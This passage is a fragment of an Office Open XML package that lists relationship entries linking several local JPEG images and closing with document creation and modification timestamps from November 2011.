	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17.jpeg" />
	<Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/18.jpeg" />
	<Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/19.jpeg" />
	<Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/20.jpeg" />
	<Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/21.jpeg" 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2011-11-21T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-21T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>